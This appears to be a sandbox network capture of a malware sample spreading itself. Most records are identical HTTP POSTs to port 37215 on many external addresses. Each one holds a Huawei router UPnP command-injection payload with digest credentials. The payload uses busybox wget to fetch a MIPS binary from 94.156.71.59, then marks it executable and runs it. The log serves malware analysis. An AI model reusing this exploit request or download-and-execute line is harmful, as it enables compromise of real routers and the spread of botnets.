                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            664192.168.2.1337076156.245.92.5237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.510425091 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            665192.168.2.135627441.179.65.11937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.511176109 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            666192.168.2.134016641.124.203.21837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.511831999 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            667192.168.2.1334816156.214.52.14837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.512531996 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            668192.168.2.1345438156.99.186.5737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.567099094 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            669192.168.2.135287241.51.65.17337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.615089893 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            670192.168.2.1350306156.0.208.20637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.637710094 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            671192.168.2.134063841.46.185.23637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.638443947 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            672192.168.2.1337932156.242.158.11637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.639133930 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            673192.168.2.135121441.253.166.20437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.639863968 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 